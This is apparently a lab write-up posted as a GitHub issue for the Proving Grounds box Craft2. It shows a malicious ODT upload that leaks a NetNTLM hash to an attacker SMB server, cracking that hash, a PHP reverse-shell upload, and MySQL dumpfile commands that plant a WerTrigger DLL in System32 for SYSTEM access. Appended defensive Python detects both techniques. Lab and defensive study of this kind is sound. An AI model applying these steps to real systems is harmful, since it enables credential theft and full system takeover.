WDavid404 / PG-Box

PG box workthough note

Craft2 (hard, Windows, 2022) ★ - made bad odt file to leak NetNTLM hash, mysql has write permission as root #46

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoints:

WDavid404 commented 3 months ago
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Craft
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 125
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

80/tcp: click "Admin logon" --> javascript:alert

Upload file button: upload a php file --> invalid file

http://192.168.156.188/upload.php

upload a php.odt file --> You're resume was submitted, it will be reviewed shortly by our staff. We are also aware of macro phishing attempts made previously

Search exploit about craft -->

445/tcp (SMB): --> crackmapexec smb 192.168.156.188 --shares

smbclient --no-pass //192.168.156.188/CRAFT2/ --> Failed (session setup failed: NT_STATUS_ACCESS_DENIED)

Since it accepts ODT file uploads --> search exploit info about ODT

pip2.7 install ezodf  
python2.7 44564.py

Got stuck...

find python3 version for generating a malicious odf file to leak NetNTLM Creds: https://github.com/rmdavy/badodf/blob/master/badodt.py

(Need "pip3 install ezodf" first)

On Kali, start an SMB server: impacket-smbserver smb_wei . -smb2support
Upload the bad.odt file on the Craft2 webpage; after a while, we get the NTLM info:
thecybergeek::CRAFT2:aaaaaaaaaaaaaaaa:5f56d9e5a2e3c9ca22f29a30734bf3c4:...

Copy the whole string above to hash.txt and run john (hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt also works) --> winniethepooh

enum4linux -a -u "CRAFT2\\thecybergeek" -p "winniethepooh" 192.168.156.188
Go to the share dir: smbclient //192.168.156.188/WebApp -U 'CRAFT2\thecybergeek'
Found we can upload files here and access them via http://$IP/, so upload a reverse shell php file: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php

Then access "http://192.168.156.188/php_windows_reverse_shell.php" --> Got a reverse shell successfully.

PE

winpeas:

--> mysql server is running and has write permission as root.

According to the resource:

  1. Clone https://github.com/sailay1996/WerTrigger
  2. Copy phoneinfo.dll to C:\Windows\System32\ --> move those files to C:\windows\system32 using MySQL.
  3. Place the Report.wer file and WerTrigger.exe in the same directory --> move those files to C:\windows\system32 using MySQL.
    select load_file('C:\\xampp\\htdocs\\phoneinfo.dll') into dumpfile 'C:\\Windows\\system32\\phoneinfo.dll';
    select load_file('C:\\xampp\\htdocs\\Report.wer') into dumpfile 'C:\\Windows\\system32\\Report.wer';
    select load_file('C:\\xampp\\htdocs\\WerTrigger.exe') into dumpfile 'C:\\Windows\\system32\\WerTrigger.exe';
  4. Then, run WerTrigger.exe.
  5. Enjoy a shell as NT AUTHORITY\SYSTEM
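The ODT upload in this box works because the document's internal links point at a host the attacker controls, so whoever opens the resume has their machine authenticate to that host. The upload handler can check for exactly that. The following Python is an added example written for this note, not code from the issue, from the box or from the badodf project; the list of XML parts scanned, the `accept_upload` policy and the `build_test_odt` fixture (which uses the documentation-range address 203.0.113.10) are assumptions constructed for the example.

```python
"""Upload-side check for ODF/ODT resumes: reject packages whose XML parts carry
xlink:href values that point at remote hosts (UNC paths, URLs), because opening
such a document makes the reader's machine reach out to that host."""
import io
import zipfile
import xml.etree.ElementTree as ET

ODT_MIME = "application/vnd.oasis.opendocument.text"
XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
# Parts of an ODF package that may carry links (assumed list for this example).
XML_PARTS = ("content.xml", "styles.xml", "settings.xml", "META-INF/manifest.xml")
# Anything that is not a plain relative package path counts as external.
REMOTE_PREFIXES = ("\\\\", "//", "smb:", "file:", "http:", "https:", "ftp:", "ldap:")


def is_odt(data: bytes) -> bool:
    """ODF packages must start with an uncompressed 'mimetype' entry."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            first = zf.infolist()[0]
            return first.filename == "mimetype" and zf.read(first).decode() == ODT_MIME
    except (zipfile.BadZipFile, IndexError, UnicodeDecodeError):
        return False


def find_external_links(data: bytes):
    """Return (part, href) for every xlink:href that points outside the package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        for part in XML_PARTS:
            if part not in names:
                continue
            for el in ET.fromstring(zf.read(part)).iter():
                href = el.get(XLINK_HREF)
                if href and href.strip().lower().startswith(REMOTE_PREFIXES):
                    hits.append((part, href))
    return hits


def accept_upload(data: bytes) -> bool:
    """Policy an upload handler could apply: valid ODT and no external links."""
    return is_odt(data) and not find_external_links(data)


# --- constructed fixture for testing the check (not a real resume) ----------
def build_test_odt(image_href: str) -> bytes:
    """Build a minimal ODT whose content.xml embeds one image reference."""
    content = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<office:document-content '
        'xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
        'xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" '
        'xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" '
        'xmlns:xlink="http://www.w3.org/1999/xlink">'
        '<office:body><office:text><text:p>Resume</text:p>'
        f'<draw:frame><draw:image xlink:href="{image_href}"/></draw:frame>'
        '</office:text></office:body></office:document-content>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        # The mimetype entry must be first and stored uncompressed.
        zf.writestr(zipfile.ZipInfo("mimetype"), ODT_MIME, compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml", content, compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


if __name__ == "__main__":
    for label, href in (("local", "Pictures/logo.png"),
                        ("remote", r"\\203.0.113.10\share\logo.png")):
        sample = build_test_odt(href)
        print(label, "accepted" if accept_upload(sample) else "rejected",
              find_external_links(sample))
```

The check only blocks one delivery route; the host-level mitigation is to stop outbound SMB (TCP 445) from workstations to the internet and to keep NTLM from being sent to untrusted hosts, which is what actually prevents the credential leak.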
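The PE step works because MySQL runs as SYSTEM and `secure_file_priv` does not confine where `INTO DUMPFILE` may write, so any database user who can run queries can copy files into C:\Windows\System32. As an added example (not from the issue, the box or the WerTrigger project), the following Python classifies a `secure_file_priv` value and scans MySQL general-query-log lines for file-write statements aimed at system or web-root directories. The log sample is constructed, its line layout is simplified to space-separated fields, and the `SENSITIVE_PREFIXES` list is an assumption to be tuned per host.

```python
"""Detect MySQL file-write statements (INTO DUMPFILE / INTO OUTFILE) that target
sensitive locations, and classify the secure_file_priv setting."""
import re

# Directories a database server should never be writing into.
# Assumed list for this example; adjust to the host's layout.
SENSITIVE_PREFIXES = (
    "c:\\windows\\",
    "c:\\program files",
    "c:\\programdata\\",
    "c:\\xampp\\htdocs\\",   # web root: a write here drops a web shell
    "/etc/", "/usr/", "/root/", "/var/www/",
)

# Simplified general-log line: <timestamp> <thread id> <command> <argument>
LOG_LINE_RE = re.compile(r"^(?P<time>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
# INTO DUMPFILE '...' / INTO OUTFILE '...' with a single-quoted path literal
FILE_WRITE_RE = re.compile(r"INTO\s+(?P<kind>DUMPFILE|OUTFILE)\s+'(?P<path>[^']*)'", re.IGNORECASE)
LOAD_FILE_RE = re.compile(r"\bload_file\s*\(", re.IGNORECASE)

# Constructed sample log lines (not from the target); the statement on thread 7
# mirrors the load_file/dumpfile pattern used in the PE step above.
SAMPLE_GENERAL_LOG = r"""
2022-06-01T10:00:01.000000Z 7 Query SELECT * FROM users WHERE id = 3
2022-06-01T10:00:02.000000Z 7 Query select load_file('C:\\xampp\\htdocs\\phoneinfo.dll') into dumpfile 'C:\\Windows\\system32\\phoneinfo.dll'
2022-06-01T10:00:03.000000Z 7 Query SELECT name INTO OUTFILE 'C:\\xampp\\tmp\\export.txt' FROM users
2022-06-01T10:00:04.000000Z 8 Query SELECT 'x' INTO DUMPFILE '/var/www/html/x.php'
"""


def normalize_path(path: str) -> str:
    """Collapse SQL-escaped backslashes, lower-case, and use backslashes on Windows paths."""
    p = path.replace("\\\\", "\\").lower()
    return p.replace("/", "\\") if re.match(r"^[a-z]:", p) else p


def is_sensitive(path: str) -> bool:
    """True when the write target sits under one of the protected directories."""
    norm = normalize_path(path)
    return any(norm.startswith(prefix.lower()) for prefix in SENSITIVE_PREFIXES)


def assess_secure_file_priv(value) -> str:
    """NULL disables LOAD_FILE / INTO OUTFILE / INTO DUMPFILE entirely; an empty
    string allows any path the service account can reach; a directory confines
    file I/O to that tree."""
    if value is None or str(value).strip().upper() == "NULL":
        return "disabled"
    if str(value).strip() == "":
        return "unrestricted"
    return "restricted"


def scan_general_log(log_text: str):
    """Return one finding per file-write statement found in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m or m.group("cmd").lower() != "query":
            continue
        stmt = m.group("arg")
        for w in FILE_WRITE_RE.finditer(stmt):
            path = w.group("path")
            findings.append({
                "thread_id": int(m.group("tid")),
                "kind": w.group("kind").upper(),
                "path": path,
                # load_file(...) INTO DUMPFILE copies an arbitrary file byte-for-byte
                "binary_copy": bool(LOAD_FILE_RE.search(stmt)),
                "severity": "high" if is_sensitive(path) else "medium",
            })
    return findings


if __name__ == "__main__":
    print("secure_file_priv='' ->", assess_secure_file_priv(""))
    for f in scan_general_log(SAMPLE_GENERAL_LOG):
        print(f)
```

The general log is expensive to keep on permanently; the same regexes apply to audit-plugin output or a proxy's query log. The durable fix is to set `secure_file_priv` to a dedicated directory (or NULL) and to run the MySQL service under a low-privilege account instead of LocalSystem, so that a write outside the data directory fails even when the query is allowed.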